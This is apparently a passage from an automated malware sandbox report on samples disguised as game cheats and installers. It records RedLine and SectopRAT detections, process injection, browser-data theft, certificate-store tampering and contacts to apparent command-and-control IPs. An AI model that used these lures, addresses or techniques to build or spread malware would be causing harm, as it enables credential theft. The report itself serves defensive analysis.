PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe
PID 2116 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\Installer.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe

Network

Country Destination Domain Proto
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp
FI 95.217.248.44:11695 tcp

Files

memory/2116-0-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

memory/2116-1-0x0000000000D20000-0x0000000000E32000-memory.dmp

memory/2116-2-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2116-3-0x0000000000900000-0x0000000000922000-memory.dmp

memory/2156-8-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2156-6-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2116-10-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2156-9-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2156-4-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2156-11-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/2156-12-0x0000000074DC0000-0x00000000754AE000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4772-0-0x0000000074AFE000-0x0000000074AFF000-memory.dmp

memory/4772-1-0x00000000002D0000-0x0000000000374000-memory.dmp

memory/4772-2-0x0000000004CF0000-0x0000000004D66000-memory.dmp

memory/4772-3-0x0000000002730000-0x000000000274E000-memory.dmp

memory/4772-4-0x0000000074AF0000-0x00000000752A0000-memory.dmp

memory/4772-5-0x0000000074AFE000-0x0000000074AFF000-memory.dmp

memory/4772-6-0x0000000074AF0000-0x00000000752A0000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2068 set thread context of 4612 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
NL 185.92.73.140:80 185.92.73.140 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 140.73.92.185.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp
NL 185.92.73.140:443 tcp

Files

memory/2068-0-0x000000007474E000-0x000000007474F000-memory.dmp

memory/2068-1-0x00000000002B0000-0x0000000000324000-memory.dmp

memory/2068-2-0x0000000005240000-0x00000000057E4000-memory.dmp

memory/2068-3-0x0000000004D30000-0x0000000004DC2000-memory.dmp

memory/2068-4-0x0000000004ED0000-0x0000000004EDA000-memory.dmp

memory/2068-5-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/2068-6-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

memory/4612-7-0x0000000000400000-0x000000000041E000-memory.dmp

memory/4612-11-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/4612-9-0x00000000057B0000-0x0000000005DC8000-memory.dmp

memory/4612-12-0x00000000052B0000-0x00000000052EC000-memory.dmp

memory/2068-13-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/4612-10-0x0000000005210000-0x0000000005222000-memory.dmp

memory/4612-14-0x00000000052F0000-0x000000000533C000-memory.dmp

memory/4612-15-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/4612-16-0x0000000005560000-0x000000000566A000-memory.dmp

memory/4612-17-0x0000000074740000-0x0000000074EF0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20241010-en

Max time kernel

137s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\launcher.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2124 set thread context of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2124 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe

Processes

C:\Users\Admin\AppData\Local\Temp\launcher.exe

"C:\Users\Admin\AppData\Local\Temp\launcher.exe"

C:\Users\Admin\AppData\Local\Temp\launcher.exe

C:\Users\Admin\AppData\Local\Temp\launcher.exe

Network

Country Destination Domain Proto
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp

Files

memory/2124-0-0x0000000074C6E000-0x0000000074C6F000-memory.dmp

memory/2124-1-0x0000000000210000-0x0000000000274000-memory.dmp

memory/2124-2-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-13-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-14-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-9-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2220-5-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2124-15-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-3-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-4-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2220-16-0x0000000074C60000-0x000000007534E000-memory.dmp

memory/2220-17-0x0000000074C60000-0x000000007534E000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREEHACK.exe"

Network

N/A

Files

memory/2272-0-0x0000000074D6E000-0x0000000074D6F000-memory.dmp

memory/2272-1-0x0000000000A50000-0x0000000000AF4000-memory.dmp

memory/2272-2-0x0000000074D60000-0x000000007544E000-memory.dmp

memory/2272-3-0x0000000074D6E000-0x0000000074D6F000-memory.dmp

memory/2272-4-0x0000000074D60000-0x000000007544E000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

144s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nixware crack.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\nixware crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nixware crack.exe

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

140s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

Network

Country Destination Domain Proto
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp

Files

memory/2336-1-0x0000000002D90000-0x0000000002DB2000-memory.dmp

memory/2336-2-0x0000000004BB0000-0x0000000004BD0000-memory.dmp

memory/2336-3-0x0000000000400000-0x0000000002C86000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Browser Information Discovery

discovery

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 75.209.201.84.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 99.208.201.84.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp

Files

memory/2396-0-0x00007FFC7E8E3000-0x00007FFC7E8E5000-memory.dmp

memory/2396-1-0x0000000000B00000-0x0000000000B2A000-memory.dmp

memory/2396-2-0x00007FFC7E8E0000-0x00007FFC7F3A1000-memory.dmp

memory/2396-29-0x000000001E3D0000-0x000000001E592000-memory.dmp

memory/2396-37-0x000000001ECA0000-0x000000001ED16000-memory.dmp

memory/2396-53-0x000000001F7D0000-0x000000001F820000-memory.dmp

memory/2396-57-0x0000000020470000-0x0000000020998000-memory.dmp

memory/2396-58-0x00007FFC7E8E3000-0x00007FFC7E8E5000-memory.dmp

memory/2396-59-0x00007FFC7E8E0000-0x00007FFC7F3A1000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240729-en

Max time kernel

144s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0